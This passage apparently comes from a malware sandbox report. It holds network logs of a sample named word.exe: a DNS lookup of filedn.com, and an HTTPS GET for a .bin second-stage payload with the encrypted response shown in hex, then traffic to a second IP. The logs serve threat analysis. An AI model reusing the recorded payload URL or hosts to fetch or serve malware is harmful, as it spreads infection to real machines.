Aug 22, 2024 16:13:39.247714043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.247961998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.251317978 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.251635075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.251635075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.254374981 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.254566908 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.256983995 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.257167101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.261086941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.261287928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.261293888 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.261452913 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.266508102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.266630888 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.266630888 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.266679049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.266685963 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.266894102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.270579100 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.270751953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.270760059 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.270967007 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.279110909 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.279436111 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.279436111 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.279447079 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.279618025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.284935951 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.285193920 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.285193920 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.288803101 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.289127111 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.289132118 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.289355040 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.293895006 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.294060946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.294275999 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.294279099 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.294450998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.298969984 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.299124956 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.299290895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.303802013 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.304018974 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.311521053 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.311702967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.311783075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.311786890 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.311996937 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.315768957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.315902948 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.315903902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.315951109 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.315954924 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.316165924 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.321341991 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.321583033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.326442957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.326595068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.326685905 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.326692104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.326827049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.329315901 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.329513073 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.329519033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.329726934 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.334647894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.334880114 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.337585926 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.337769032 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.341131926 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.341353893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.341358900 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.341520071 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.346726894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.346946001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.346946001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.347939968 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.348162889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.350547075 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.350729942 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.355614901 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.355850935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.358004093 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.358139038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.361344099 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.361670971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.361675978 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.361896038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.366230965 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.366389990 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.366389990 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.366554976 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.366559029 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.366766930 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.370604038 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.370762110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.370928049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.370932102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.371140003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.376007080 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.376332045 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.376332045 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.377913952 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.378117085 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.380449057 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.380608082 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.380707026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.384319067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.384452105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.384582043 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.386148930 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.386307001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.390897989 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.391068935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.391117096 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.391120911 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.391283035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.396450043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.396632910 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.396637917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.396847010 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.400671005 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.400861979 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.400867939 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.401076078 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.406070948 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.406208038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.406423092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.406426907 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.406635046 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.410310984 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.410487890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.410587072 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.415472031 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.415659904 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.415824890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.416944981 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.417146921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.421329021 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.421451092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.421451092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.421498060 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.421502113 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.421664953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.425293922 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.425467014 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.425472975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.425648928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.430149078 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.430316925 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.430367947 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.433351040 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.433587074 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.440232038 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.440392017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.440392017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.440398932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.440606117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.446304083 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.446351051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.446516037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.470186949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.470187902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.470243931 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.470448017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:45.989012003 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:45.989037037 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:45.989213943 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:45.995755911 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:45.995769024 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:46.509879112 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:46.510114908 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:46.512209892 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:46.512218952 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:46.512413979 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:46.523520947 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:46.564227104 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:47.011137962 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:47.011203051 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:47.011382103 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:47.011414051 CEST	443	49795	186.2.171.76	192.168.11.20
Aug 22, 2024 16:13:47.011559010 CEST	49795	443	192.168.11.20	186.2.171.76
Aug 22, 2024 16:13:47.044872046 CEST	49795	443	192.168.11.20	186.2.171.76

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 22, 2024 16:13:34.782094002 CEST	49217	53	192.168.11.20	1.1.1.1
Aug 22, 2024 16:13:34.987310886 CEST	53	49217	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 22, 2024 16:13:34.782094002 CEST	192.168.11.20	1.1.1.1	0xd550	Standard query (0)	filedn.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 22, 2024 16:13:34.987310886 CEST	1.1.1.1	192.168.11.20	0xd550	No error (0)	filedn.com		74.120.9.25	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filedn.com

186.2.171.76

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49794	74.120.9.25	443	8792	C:\Users\user\Desktop\word.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-22 14:13:35 UTC	197	OUT	GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: filedn.com Cache-Control: no-cache
2024-08-22 14:13:35 UTC	409	IN	HTTP/1.1 200 OK Server: CacheHTTPd v1.0 Date: Thu, 22 Aug 2024 14:13:35 +0000 Content-Type: application/octet-stream Content-Length: 2195008 Etag: "4332775a73fb77dd181cccae6c1ea0faadd45262" Expires: Thu, 22 Aug 2024 20:13:35 +0000 Content-Disposition: attachment; filename="OdwulMHhYKs243.bin" Accept-Ranges: bytes Content-Transfer-Encoding: binary Connection: keep-alive Keep-Alive: timeout=30
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: b2 d8 40 5b 19 d4 0f 64 c1 0b 3d f8 55 74 a6 39 88 d5 f0 c0 f7 7d a4 e0 66 f3 05 2f 50 dd 00 12 d8 51 8a bd 45 aa a5 bb 6a f2 d6 f3 db 78 fc bc fa 22 50 97 1d 71 0b 99 2e 18 99 14 83 9f 5b da ad 12 e0 ec 1e 6e 42 58 9d 2e fa c4 30 43 0b b0 86 c2 4c a9 c0 5e 1d d3 e6 d8 8b b7 06 57 25 4c 7b 55 1f 4c a3 4b 15 17 1f ec 79 bb fe b8 da 8f 37 5e ec bf 28 1a f5 92 cd 28 2d d2 46 b6 5b 28 d3 f3 e2 ff 03 05 57 3c f5 2a 04 94 17 94 06 fe 37 0e 73 96 3e c7 70 f1 7d 3e 2a 6f 6d 0c 43 1b 29 01 69 54 c8 bb e3 9b 80 b8 ed dc be cd 08 dc 76 5f 7e 1b 68 b8 67 1a 00 e0 eb d8 2b 7e a5 1a 8e 03 74 18 dd a1 9d 73 2c 21 c6 a4 8b e7 e7 73 27 a4 db 26 28 1f 4d fe bc c6 0a 7a bc 90 32 de 68 b9 b6 65 71 30 b2 32 30 eb 7a 55 ad 18 c1 c9 fd 94 69 1d 2e 5b 18 3d 12 9a fb a6 bd eb 48 Data Ascii: @[d=Ut9}f/PQEjx"Pq.[nBX.0CL^W%L{ULKy7^((-F[(W<7s>p}>omC)iTv_~hg+~ts,!s'&(Mz2heq020zUi.[=H
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 87 3d 44 4a b2 35 6e 26 f9 f5 5f 19 bc e7 36 29 eb 25 3c 8b d8 55 c4 15 d1 99 32 c0 04 71 ec 1d 90 43 4b 95 3f f6 e8 c4 bc 0d a7 43 52 4e a9 c4 5e 36 cb b7 dd ab d3 80 57 25 b2 7a 46 12 5d ae 67 1c 17 19 f4 04 2b fc b8 de 8f 31 4f e8 a0 3c 32 70 92 cd 22 50 43 c4 b6 5f 2e d5 f3 64 d9 86 b1 5e fb cb 8a 5d a5 48 b7 52 92 58 06 c2 e4 4c ac 9a 5f 1c 53 0b 1f 0a 65 2b 0f cf 23 0b 35 82 df f9 8a a0 d1 89 da fd 93 5d ea 0a 36 94 17 29 35 6a 10 2e c6 ed d1 34 66 fd 05 9e 1e 09 8b 93 a0 9a 75 e5 50 68 ea 0a e7 e7 79 5a 30 d9 26 cc 19 7e f8 a9 ef bb 7a bc 38 6f 4b 6a 63 b2 63 60 36 ad 3e 42 d3 5a 55 a7 45 57 cb fd 70 58 1b 38 73 dd 3d 12 b0 e8 a1 ac ee 5b 3a c6 77 48 51 1c 86 b2 47 0b 8a 59 52 53 a1 03 5d 8c 59 5f 86 c6 1f 6f 5d 2d 34 d4 0f 40 2d 2e f0 4d 35 3d 87 Data Ascii: =DJ5n&_6)%<U2qCK?CRN^6W%zF]g+1O<2p"PC_.d^]HRXL_Se+#5]6)5j.4fuPhyZ0&~z8oKjcc`6>BZUEWpX8s=[:wHQGYRS]Y_o]-4@-.M5=
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 81 e5 cf bc 0f af 79 dd 5d da ef 5e 1d d9 c9 ea 8b b7 0c 57 27 37 5a 55 1f 48 b9 24 26 17 1f e6 79 b9 85 99 da 8f 33 2c 74 ba 28 6a 9a af cd 28 27 d2 c4 cd 7a 28 dd e8 4f 9e 59 b1 5e fb d4 90 27 d8 da 75 12 b4 5e 7d 03 a7 3f 9d 17 83 16 7b 3c 0c 0c 68 2d 76 4a 09 3c 31 e8 c3 96 f7 a2 aa 95 fc fa 86 73 5f 1b 30 10 7e 44 95 04 11 24 e0 cb e1 2a 7e a5 69 f1 46 74 12 b9 98 9e 73 fe 56 70 ea b2 e7 e7 79 25 df c6 26 c8 1b 00 c4 b7 c7 30 7a be 1a 2b de 68 69 b4 1e 69 30 b2 36 05 68 5a 55 a7 38 c3 e1 c4 74 49 17 2c 20 4f 3d 12 be 94 9c bd e9 42 35 d5 50 62 5f 0d 82 90 37 1c 8a 59 78 2c b0 03 4c 88 79 56 82 b4 04 41 01 65 f5 ef 0f 40 27 5c 26 4b 2a 60 87 27 37 ff 90 1e ec 16 25 ba 5c 93 94 01 3c fe 43 42 f4 10 e4 45 0a 5e 4b e8 00 bc 98 47 bf 09 eb 08 dc 74 c9 de Data Ascii: y]^W'7ZUH$&y3,t(j('z(OY^'u^}?{<h-vJ<1s_0~D$~iFtsVpy%&0z+hii06hZU8tI, O=B5Pb_7Yx,LyVAe@'\&K`'7%\<CBE^KGt
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 8d 1f fb ec bf 22 17 fc be e6 28 2f d0 38 b0 68 28 dd ea 2b 7b 01 b1 58 e8 59 81 05 d8 db 90 44 95 fc 58 44 e2 ee 8d 0f 86 be 7b ac 0c 0c 68 0b 4c 25 20 0b 31 ea bb 1c fc a0 a1 ab d6 fa 82 5d fc 18 27 97 ad 46 b5 6b 35 32 ff c4 45 44 10 a5 1a d4 5e ee 12 93 db b7 73 f4 52 09 71 8b e7 e3 5f 0e a6 a0 0f c8 1f 6b 85 04 c7 3a 7e bf 5d f6 de 68 69 9a 73 73 4b 9b 32 6a 56 21 e6 ad 38 c5 ca 92 91 49 1d 24 4f a6 3e 39 bb ed b5 b9 f8 4c 19 c3 78 59 24 24 88 92 48 71 39 59 7c 47 89 6c a9 82 79 5e 8e c6 1d 3a 28 15 9a d0 74 f4 2d 28 e5 67 03 63 d4 32 37 ff 9e 65 5a 00 0d c4 5f fc 7a 01 3e e2 47 2f f6 6b c7 45 08 28 9c 59 00 cc b4 75 d0 ec e1 08 d4 77 1f 79 94 21 ee 19 2a f9 d4 b7 49 70 77 22 d7 4a e7 20 cf 96 da a1 49 17 d1 cf 8d 1d 9e 20 15 f7 c8 d5 bb e8 d4 73 84 Data Ascii: "(/8h(+{XYDXD{hL% 1]'Fk52ED^sRq_k:~]hissK2jV!8I$O>9LxY$$Hq9Y\|Gly^:(t-(gc27eZ_z>G/kE(Yuwy!*Ipw"J I s
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 48 80 18 81 1c 55 22 90 0d 62 2b 1b 60 21 0b 3b e8 cb ed a8 a0 d1 87 d4 f6 80 5b fa 33 ac 1b 7e 40 da 57 10 24 ea eb d8 29 05 8c 1a de 42 0f b9 91 a0 9a 6b 0a 57 61 cd 9a e8 cb 5d 27 a6 a0 77 c8 1f 6b d6 bc c5 3a 7c 94 ae 13 de 6e 0c 8b 65 71 3a b2 30 11 0f 5a 55 a9 10 cd cb fd 72 61 81 2f 5b 5e 52 2f ba fb ac bd e9 4a 4e fe 78 5b 5b 76 29 92 4c 0e 93 a7 7d 50 9a 12 5c ae 57 54 86 bd 4e 41 01 11 b2 cc 0d 40 2b 00 7d 4a 2a 67 c0 26 37 ff 90 1e ec 7b 50 c0 5c 97 b6 0d 3c e8 6d 11 68 11 ee 43 67 11 e7 ed 0a cc b0 74 97 4e e1 08 d8 63 e3 01 e2 20 f8 0e 38 87 47 9b 5d 7a 75 5b 85 63 e7 24 b0 59 7b a1 4d 10 a8 d4 8c 0e 85 3b 04 cf ca d7 c2 d7 a9 55 80 18 92 fc 4e 1d 71 af 25 84 f7 d5 1f 18 ce ce 92 d5 58 60 25 0e a0 f2 00 62 53 1c 76 85 17 2d 68 e7 e8 c2 17 7b Data Ascii: HU"b+`!;[3~@W$)BkWa]'wk:\|neq:0ZUra/[^R/JNx[[v)L}P\WTNA@+}J*g&7{P\<mhCgtNc 8G]zu[c$Y{M;UNq%X`%bSv-h{
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 9b b9 d8 2b 7a 8d 3e dc 46 72 30 0d a1 9e 75 9b 5d 73 c2 81 e7 e5 08 78 a4 db 22 e0 3c 6d fe b1 ef a6 7b bc 34 7d e3 68 63 bc 65 73 26 9a ec 6a 52 50 55 ad 31 d7 37 fc 67 42 0c 25 77 76 3d 10 c1 a9 a6 bd ed 60 2a d5 78 5d 77 91 89 92 4a 65 81 58 7c 49 8a 01 37 dd 79 54 80 ee 3f 43 01 13 b2 48 0e 40 2b 47 dc 4b 2a 6b af 1b 3e e9 64 1c fd 0c 1c cc 70 d5 9e 03 45 c1 6b 39 f0 6b 59 45 08 28 ca e1 28 e4 b2 76 b9 21 7d 09 de 65 ca 71 bd 5b d1 0a 2f ec aa 2c 5d 70 71 4a f3 48 cf 1d b4 22 dc b2 43 16 af 24 a5 58 94 2a 13 f0 cc d5 d1 cf fc 35 80 18 90 ef 5c 66 38 a6 25 82 c8 e1 1e 19 c8 c4 92 d5 58 2f 25 0e a0 e4 85 48 40 0d 63 ef 9a 23 68 e1 85 11 16 14 c5 f5 30 37 b8 0c 43 e7 b2 24 10 bb a4 ac 94 72 27 56 b1 b2 09 47 33 79 a3 fd fd 8b 42 5c c7 ea b4 40 86 a2 b9 Data Ascii: +z>Fr0u]sx"<m{4}hces&jRPU17gB%wv=`x]wJeX\|I7yT?CH@+GKk>dpEk9kYE((v!}eq[/,]pqJH"C$X*5\f8%X/%H@c#h07C$r'VG3yB\@
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 12 de 62 63 b4 1e 12 30 b2 36 7d 3d 8d 55 ad 32 c1 cb e7 5c 20 1d 2e 5d 58 3d 12 90 e8 96 bf e9 72 35 d7 78 5a 5f 0d 99 92 4e 71 a7 59 7c 47 9e fd 4f 88 7f 78 94 c6 1d 3a 2c 15 9a d0 60 a9 2d 28 eb 6d 2a 4a b4 1b 35 fd e9 9e ef 00 0b bd 71 93 9e 05 3c 93 46 39 f4 14 ec 2a e0 2c e7 e7 00 cc 9a 76 bf 1a d1 0b de 18 e1 7a bf 20 f8 0a 2f e8 d3 e0 3f 70 75 5d fc 31 ce 24 b4 26 f6 ac 4f 6f 97 2a 8d 19 ef 8b 15 e3 c7 fa db c3 af 5b 80 18 92 d0 5c 64 68 87 25 80 e4 c1 9c 19 ce c0 84 29 20 29 24 18 8f f1 6c 24 52 1d 72 f4 b6 2f 13 8d fe 3c 12 16 ba b3 b5 36 bc 26 4e e5 c9 35 20 bf a0 d7 53 09 0f 52 9a b7 0b d6 e7 6a b1 e6 ef b0 27 36 c7 ea b0 54 ee 98 bb 1f f5 e1 53 33 ad 41 44 52 35 c3 e0 27 a4 fd 9e 70 9f 75 1f b7 3f cc 44 72 3a a2 41 f8 b5 d0 c9 03 cc 15 9a 2d Data Ascii: bc06}=U2\ .]X=r5xZ_NqY\|GOx:,`-(mJ5q<F9,vz /?pu]1$&Oo*[\dh%) )$l$Rr/<6&N5 SRj'6TS3ADR5'pu?Dr:A-
